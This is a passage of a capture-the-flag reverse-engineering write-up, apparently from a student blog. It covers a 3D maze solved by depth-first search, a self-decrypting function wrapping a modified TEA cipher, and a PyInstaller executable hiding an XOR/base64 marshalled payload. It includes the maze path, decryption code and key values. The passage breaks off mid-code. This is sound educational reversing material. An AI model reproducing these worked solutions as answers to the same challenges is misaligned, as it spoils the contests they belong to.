class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span 
class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span 
class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span 
class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span 
class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span 
class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>]<br><br><br><span class="hljs-comment"># maze[x * 64 + y * 8 + z]</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">check_point_valid</span>(<span class="hljs-params"><span class="hljs-built_in">map</span>, x, y, z</span>):<br> <span class="hljs-keyword">if</span> (x >= <span class="hljs-number">0</span>) <span class="hljs-keyword">and</span> (x <= <span class="hljs-number">7</span>) <span class="hljs-keyword">and</span> (y >= <span class="hljs-number">0</span>) <span class="hljs-keyword">and</span> (y <= <span class="hljs-number">7</span>) <span 
class="hljs-keyword">and</span> (z >= <span class="hljs-number">0</span>) <span class="hljs-keyword">and</span> (z <= <span class="hljs-number">7</span>):<br> <span class="hljs-keyword">return</span> (<span class="hljs-built_in">map</span>[x * <span class="hljs-number">64</span> + y * <span class="hljs-number">8</span> + z] != <span class="hljs-number">1</span>) <span class="hljs-keyword">and</span> ((<span class="hljs-built_in">map</span>[x * <span class="hljs-number">64</span> + y * <span class="hljs-number">8</span> + z] == <span class="hljs-number">0</span>) <span class="hljs-keyword">or</span> (<span class="hljs-built_in">map</span>[x * <span class="hljs-number">64</span> + y * <span class="hljs-number">8</span> + z] == <span class="hljs-number">2</span>))<br> <span class="hljs-keyword">else</span>:<br> <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">gen_nex</span>(<span class="hljs-params"><span class="hljs-built_in">map</span>, x, y, z</span>):<br> all_dir = []<br> <span class="hljs-keyword">if</span> check_point_valid(<span class="hljs-built_in">map</span>, x - <span class="hljs-number">1</span>, y, z):<br> all_dir.append((x - <span class="hljs-number">1</span>, y, z, <span class="hljs-string">'q'</span>))<br> <span class="hljs-keyword">if</span> check_point_valid(<span class="hljs-built_in">map</span>, x + <span class="hljs-number">1</span>, y, z):<br> all_dir.append((x + <span class="hljs-number">1</span>, y, z, <span class="hljs-string">'u'</span>))<br> <span class="hljs-keyword">if</span> check_point_valid(<span class="hljs-built_in">map</span>, x, y - <span class="hljs-number">1</span>, z):<br> all_dir.append((x, y - <span class="hljs-number">1</span>, z, <span class="hljs-string">'w'</span>))<br> <span class="hljs-keyword">if</span> check_point_valid(<span class="hljs-built_in">map</span>, x, y + <span class="hljs-number">1</span>, 
z):<br> all_dir.append((x, y + <span class="hljs-number">1</span>, z, <span class="hljs-string">'s'</span>))<br> <span class="hljs-keyword">if</span> check_point_valid(<span class="hljs-built_in">map</span>, x, y, z - <span class="hljs-number">1</span>):<br> all_dir.append((x, y, z - <span class="hljs-number">1</span>, <span class="hljs-string">'a'</span>))<br> <span class="hljs-keyword">if</span> check_point_valid(<span class="hljs-built_in">map</span>, x, y, z + <span class="hljs-number">1</span>):<br> all_dir.append((x, y, z + <span class="hljs-number">1</span>, <span class="hljs-string">'d'</span>))<br> <span class="hljs-built_in">print</span>(all_dir)<br> <span class="hljs-keyword">return</span> all_dir<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">check_success</span>(<span class="hljs-params"><span class="hljs-built_in">map</span>, x, y, z</span>):<br> <span class="hljs-keyword">if</span> <span class="hljs-built_in">map</span>[x * <span class="hljs-number">64</span> + y * <span class="hljs-number">8</span> + z] == <span class="hljs-number">2</span>:<br> <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span><br> <span class="hljs-keyword">else</span>:<br> <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dfs</span>(<span class="hljs-params">mapb, x, y, z, path</span>):<br> <span class="hljs-built_in">map</span> = mapb.copy()<br> <span class="hljs-keyword">if</span> <span class="hljs-built_in">map</span>[x * <span class="hljs-number">64</span> + y * <span class="hljs-number">8</span> + z] != <span class="hljs-number">2</span>:<br> <span class="hljs-built_in">map</span>[x * <span class="hljs-number">64</span> + y * <span class="hljs-number">8</span> + z] = <span class="hljs-number">1</span><br> <span class="hljs-keyword">if</span> check_success(<span class="hljs-built_in">map</span>, x, 
y, z):<br> <span class="hljs-built_in">print</span>(path)<br> <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span><br><br> next_point = gen_nex(<span class="hljs-built_in">map</span>, x, y, z)<br> <span class="hljs-keyword">for</span> n <span class="hljs-keyword">in</span> next_point:<br> pathn = path + n[<span class="hljs-number">3</span>]<br> dfs(<span class="hljs-built_in">map</span>, n[<span class="hljs-number">0</span>], n[<span class="hljs-number">1</span>], n[<span class="hljs-number">2</span>], pathn)<br><br><br>outpus = <span class="hljs-string">""</span><br>dfs(maze, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, outpus)<br></code></pre></td></tr></table></figure><blockquote><p>ssdddssuuuwwwwqqqdddduussaauuuaaaaassssqddddddduuwwwaasusssdd</p></blockquote><p>Analysing the final function, the flag can be obtained directly through dynamic debugging.</p><p><img src="C:\Users\a\AppData\Roaming\Typora\typora-user-images\image-20231031183240426.png" alt="image-20231031183240426"></p><h3 id="WEEK3-ststst"><a href="#WEEK3-ststst" class="headerlink" title="[WEEK3]ststst"></a>[WEEK3]ststst</h3><p>SMC plus TEA.</p><p>Analysing the code, there is a function that rewrites memory, together with an mprotect call that grants write permission on that memory; we guess this is SMC self-decryption. mprotect(&dword_400000, 0x1000, 7) makes the page at 0x400000 readable, writable and executable, the loop XORs every byte from sub_400696 up to sub_400763 with 0xC3, and the final mprotect with 5 (read and execute) removes write access again.</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">int</span> <span class="hljs-title function_">sub_400763</span><span class="hljs-params">()</span><br>{<br> <span class="hljs-type">int</span> i; <span class="hljs-comment">// [rsp+Ch] [rbp-14h]</span><br><br> mprotect(&dword_400000, <span class="hljs-number">0x1000</span>uLL, <span class="hljs-number">7</span>);<br> <span class="hljs-keyword">for</span> ( i = <span 
class="hljs-number">0</span>; i < (sub_400763 - sub_400696); ++i )<br> *(sub_400696 + i) ^= <span class="hljs-number">0xC3</span>u;<br> <span class="hljs-keyword">return</span> mprotect(&dword_400000, <span class="hljs-number">0x1000</span>uLL, <span class="hljs-number">5</span>);<br>}<br></code></pre></td></tr></table></figure><p>直接动调,然后选中全部的数据按u,然后选中函数头按c和p,就可以编译成一个完整的函数,我们可以看到是一个魔改tea加密,他修改了sum的值,我们用别人的脚本跑一下就行</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs c">__int64 __fastcall <span class="hljs-title function_">sub_400696</span><span class="hljs-params">(<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> *a1, _DWORD *key)</span><br>{<br> __int64 result; <span class="hljs-comment">// rax</span><br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> v0; <span class="hljs-comment">// [rsp+10h] [rbp-10h]</span><br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> v1; <span class="hljs-comment">// [rsp+14h] [rbp-Ch]</span><br> <span class="hljs-type">int</span> sum; <span class="hljs-comment">// [rsp+18h] [rbp-8h]</span><br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> i; <span class="hljs-comment">// [rsp+1Ch] 
[rbp-4h]</span><br><br> v0 = *a1;<br> v1 = a1[<span class="hljs-number">1</span>];<br> sum = <span class="hljs-number">0</span>;<br> <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i <= <span class="hljs-number">31</span>; ++i )<br> {<br> sum -= <span class="hljs-number">0x61C88647</span>;<br> v0 += (v1 + sum) ^ (<span class="hljs-number">16</span> * v1 + *key) ^ ((v1 >> <span class="hljs-number">5</span>) + key[<span class="hljs-number">1</span>]);<br> v1 += (v0 + sum) ^ (<span class="hljs-number">16</span> * v0 + key[<span class="hljs-number">2</span>]) ^ ((v0 >> <span class="hljs-number">5</span>) + key[<span class="hljs-number">3</span>]);<br> }<br> *a1 = v0;<br> result = v1;<br> a1[<span class="hljs-number">1</span>] = v1;<br> <span class="hljs-keyword">return</span> result;<br>}<br></code></pre></td></tr></table></figure><p><a href="https://blog.csdn.net/mary19920410/article/details/71518130">A brief look at uint8_t / uint16_t / uint32_t / uint64_t in C (CSDN blog)</a></p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdint.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><br><br><span class="hljs-type">int</span> delta = <span class="hljs-number">0x61C88647</span>;<br><br><span class="hljs-type">void</span> <span class="hljs-title function_">decrypt</span><span class="hljs-params">(<span class="hljs-type">uint32_t</span>* v, <span class="hljs-type">uint32_t</span>* k)</span> {<br>    <span class="hljs-type">uint32_t</span> v3 = v[<span class="hljs-number">0</span>];<br>    <span class="hljs-type">uint32_t</span> v4 = v[<span class="hljs-number">1</span>];<br>    <span class="hljs-type">uint32_t</span> sum = <span class="hljs-number">32u</span> * (<span class="hljs-number">0u</span> - (<span class="hljs-type">uint32_t</span>)delta); <span class="hljs-comment">/* 0xC6EF3720: value of sum after the 32 encryption rounds (unsigned, so no signed overflow) */</span><br>    <span class="hljs-type">int</span> i = <span class="hljs-number">0</span>;<br>    <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i <= <span class="hljs-number">31</span>; i++) {<br>        v4 -= (v3 + sum) ^ (<span class="hljs-number">16</span> * v3 + k[<span class="hljs-number">2</span>]) ^ ((v3 >> <span class="hljs-number">5</span>) + k[<span class="hljs-number">3</span>]);<br>        v3 -= (v4 + sum) ^ (<span class="hljs-number">16</span> * v4 + k[<span class="hljs-number">0</span>]) ^ ((v4 >> <span class="hljs-number">5</span>) + k[<span class="hljs-number">1</span>]);<br>        sum += <span class="hljs-number">0x61C88647</span>; <span class="hljs-comment">/* undoes the sum -= 0x61C88647 of each encryption round */</span><br>    }<br>    v[<span class="hljs-number">0</span>] = v3;<br>    v[<span class="hljs-number">1</span>] = v4;<br>}<br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> {<br>    <span class="hljs-type">uint32_t</span> key[<span class="hljs-number">4</span>] = { <span class="hljs-number">0x01234567</span>, <span class="hljs-number">0x89ABCDEF</span>, <span class="hljs-number">0xFEDCBA98</span>, <span class="hljs-number">0x76543210</span> };<br>    <span class="hljs-type">uint32_t</span> <span class="hljs-built_in">array</span>[<span class="hljs-number">8</span>] = { <span class="hljs-number">0xDB8F2569</span>, <span class="hljs-number">0x40CD83E3</span>, <span class="hljs-number">0xA033E680</span>, <span class="hljs-number">0xFFF7A644</span>,<br>                          <span class="hljs-number">0x690C3A17</span>, <span class="hljs-number">0xB621B866</span>, <span class="hljs-number">0x34E7E2A7</span>, <span class="hljs-number">0xAD10A692</span> }; <span class="hljs-comment">/* ciphertext */</span><br>    <span class="hljs-type">uint32_t</span> temp[<span class="hljs-number">2</span>] = { <span class="hljs-number">0</span> };<br>    <span class="hljs-type">int</span> i = <span class="hljs-number">0</span>;<br>    <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i <= <span class="hljs-number">7</span>; i += <span class="hljs-number">2</span>) {<br>        temp[<span class="hljs-number">0</span>] = <span class="hljs-built_in">array</span>[i];<br>        temp[<span class="hljs-number">1</span>] = <span class="hljs-built_in">array</span>[i + <span class="hljs-number">1</span>];<br>        decrypt(temp, key);<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%c%c%c%c%c%c%c%c"</span>, *((<span class="hljs-type">char</span>*)&temp[<span class="hljs-number">0</span>] + <span class="hljs-number">0</span>), *((<span class="hljs-type">char</span>*)&temp[<span class="hljs-number">0</span>] + <span class="hljs-number">1</span>), *((<span class="hljs-type">char</span>*)&temp[<span class="hljs-number">0</span>] + <span class="hljs-number">2</span>), *((<span class="hljs-type">char</span>*)&temp[<span class="hljs-number">0</span>] + <span class="hljs-number">3</span>),<br>               *((<span class="hljs-type">char</span>*)&temp[<span class="hljs-number">1</span>] + <span class="hljs-number">0</span>), *((<span class="hljs-type">char</span>*)&temp[<span class="hljs-number">1</span>] + <span class="hljs-number">1</span>), *((<span class="hljs-type">char</span>*)&temp[<span class="hljs-number">1</span>] + <span class="hljs-number">2</span>), *((<span class="hljs-type">char</span>*)&temp[<span class="hljs-number">1</span>] + <span class="hljs-number">3</span>));<br>    }<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></table></figure><h3 id="WEEK3-easyre"><a href="#WEEK3-easyre" class="headerlink" title="[WEEK3]easyre"></a>[WEEK3]easyre</h3><p>This one is an .exe, and unlike the earlier challenges DIE (Detect It Easy) reports it as a PyInstaller bundle, so we unpack it and decompile the Python inside:</p><blockquote><p>python pyinstxtractor-ng.py 1.exe<br>uncompyle6 main.pyc > main.py</p></blockquote><p>This turns the extracted main.pyc back into Python source.</p><p>The XOR key is 23 (the writeup got it from GPT; it is also visible in the decompiled main.py). Following the program logic, it XORs an embedded blob with 23, base64-decodes the result, unmarshals it into a code object and runs it with <code>exec</code>, so the code we actually need never exists as a file and does not appear in the decompilation:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br><span class="hljs-keyword">import</span> marshal<br><span class="hljs-keyword">from</span> dis <span class="hljs-keyword">import</span> dis<br><br>encoded_data = <span class="hljs-string">b'...'</span><br><br><br>xor_decoded_data = <span class="hljs-built_in">bytes</span>([byte ^ <span 
class="hljs-number">23</span> <span class="hljs-keyword">for</span> byte <span class="hljs-keyword">in</span> encoded_data])<br>decoded_data = base64.b64decode(xor_decoded_data)<br>code_obj = marshal.loads(decoded_data)<br><span class="hljs-built_in">exec</span>(code_obj)<br></code></pre></td></tr></table></figure><blockquote><p>exec is a Python built-in that executes dynamically generated Python code. It takes a code object (built either from a string of source or from compiled bytecode) and runs the statements it contains.</p></blockquote><p>The important part: it accepts a code object, which is normally built either from source text or from compiled bytecode.</p><p>And <code>marshal.loads(decoded_data)</code> deserialises it from Python's marshal format, which is exactly what a .pyc file holds after its header. So <code>decoded_data</code> is a bare marshalled code object, i.e. bytecode without the .pyc header, and instead of executing it we can disassemble <code>code_obj</code> with the <code>dis</code> module to see the bytecode it contains:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br><span class="hljs-keyword">import</span> marshal<br><span class="hljs-keyword">from</span> dis <span class="hljs-keyword">import</span> dis<br><br>encoded_data = <span 
class="hljs-string">b'#`VVVVVVVVVVVVVVVVVVVVVSVVVVFVVVV_YZVVVVMVU|VNFV@pU|V{xUMVYvVzBSMVDSVFRVMFDSV\\VQMV@\x7fVAxPMFU{V@BPp`]vU%B_MF]eVy]VMFY|UxZUVFUbTPBSMVrSVFRVMV\x7fCVT|]N`^VVVVVVVVVVVVVVVpVVVVPVVVVF`VVV_GFVVVVsVU\'V@FUp`PSVO\'TMV].V$FUMVPSVBFVOC".U_`SqV]/UU|VQ`U/V_`RsV]/V^ZUQpVMVUtVMVR@V_\'SqV]/Vo|VqV]/UU|VVpU/Vy`RGVU/Vy`SGVUoPPFTUVU.U_\'SsVXSV_\'QqVQRVQ&pqFM/UPFSQ`U|VENVqFE/V$`TqVFMVUtVMVR@V_\'SqV]/Vo|VqV]/UU|VVpU/Vy`RGVU/Vy`SGVU/Vy`TqVFMV_`TqVZMVUtVMVR@VU|VqFs/UvVRqVM/U\'RVxFRUV_QfqVACVT|RCb|VVFVV!FVVVVSgVFVVVT|Q%pEdvOY\'%pAnN@"yMsxSuPAb%p{~rOE{NO]nNOyvUzQ`tPAbMT|^%pYeMO{vTOUdN@{bsPA#sYxUB.xUvcxUvAx\\N%{`vPAnsPA#sYxRN%\x7f\x7ftcxUv!|Vtp/VVVS!UzM&u~"`rsx[tzZ\'O%AbN$]"t_FUVVVVto`VVVVVVF`UUV^ZVDVU_V^^VFNTTVRZVEVUPpRNVEVTt\x7fRVVVUmT`VVVPA#N@&`uPAqv%A"tnxVVVSN{U!ez%M\'!&&VP ez!UZmA.\'X"g^\'/NUcvXd.TPRTTD!&UB\\`dT.R}Q{!QQUdr~UguyU&sTU"u$An^PMdN@t!rpA&sPNcXQxSr@Am@p]bu\'#gT_^EVVVVtp|VVVUvU@YxM@Ye%pA`tz{bsYxQv@"`sOCvUzAbN%.|MsxRMzo\x7fM&x]M@"}ty{`sPA|tp/VVVUnS`VVV_^GVVVVt\x7fVVVVSvTSocu%E&uPB<VFVVV_ZFVVVVTUFRVFFTTVRZVpxTTVR\\Vp**'</span><br><br><br>xor_decoded_data = <span class="hljs-built_in">bytes</span>([byte ^ <span class="hljs-number">23</span> <span class="hljs-keyword">for</span> byte <span class="hljs-keyword">in</span> encoded_data])<br>decoded_data = base64.b64decode(xor_decoded_data)<br>code_obj = marshal.loads(decoded_data)<br>dis(code_obj)<br><br></code></pre></td></tr></table></figure><p>得到字节码后我们直接gpt,转换成正常的py代码,如果gpt是傻子可以尝试第二种方式</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br><span 
class="hljs-keyword">import</span> marshal<br><br>encoded_data = <span class="hljs-string">b'...'</span><br><br>xor_decoded_data = <span class="hljs-built_in">bytes</span>([byte ^ <span class="hljs-number">23</span> <span class="hljs-keyword">for</span> byte <span class="hljs-keyword">in</span> encoded_data])<br><br>decoded_data = base64.b64decode(xor_decoded_data)<br><br><span class="hljs-built_in">open</span>(<span class="hljs-string">"new.pyc"</span>,<span class="hljs-string">"wb"</span>).write(decoded_data)<br></code></pre></td></tr></table></figure><p>Write the decoded bytes to a file. Tools will not yet recognise it as a .pyc, because a marshalled code object carries no header. Take the 16-byte header (magic number, flags, source timestamp and source size, the layout used since Python 3.7) from any of the .pyc files that pyinstxtractor extracted from the same bundle, which guarantees the magic matches the interpreter version the bytecode was compiled for (3.8 here), and prepend it to new.pyc to repair it.</p><p>Then decompile again with <code>uncompyle6 new.pyc > 1.py</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span 
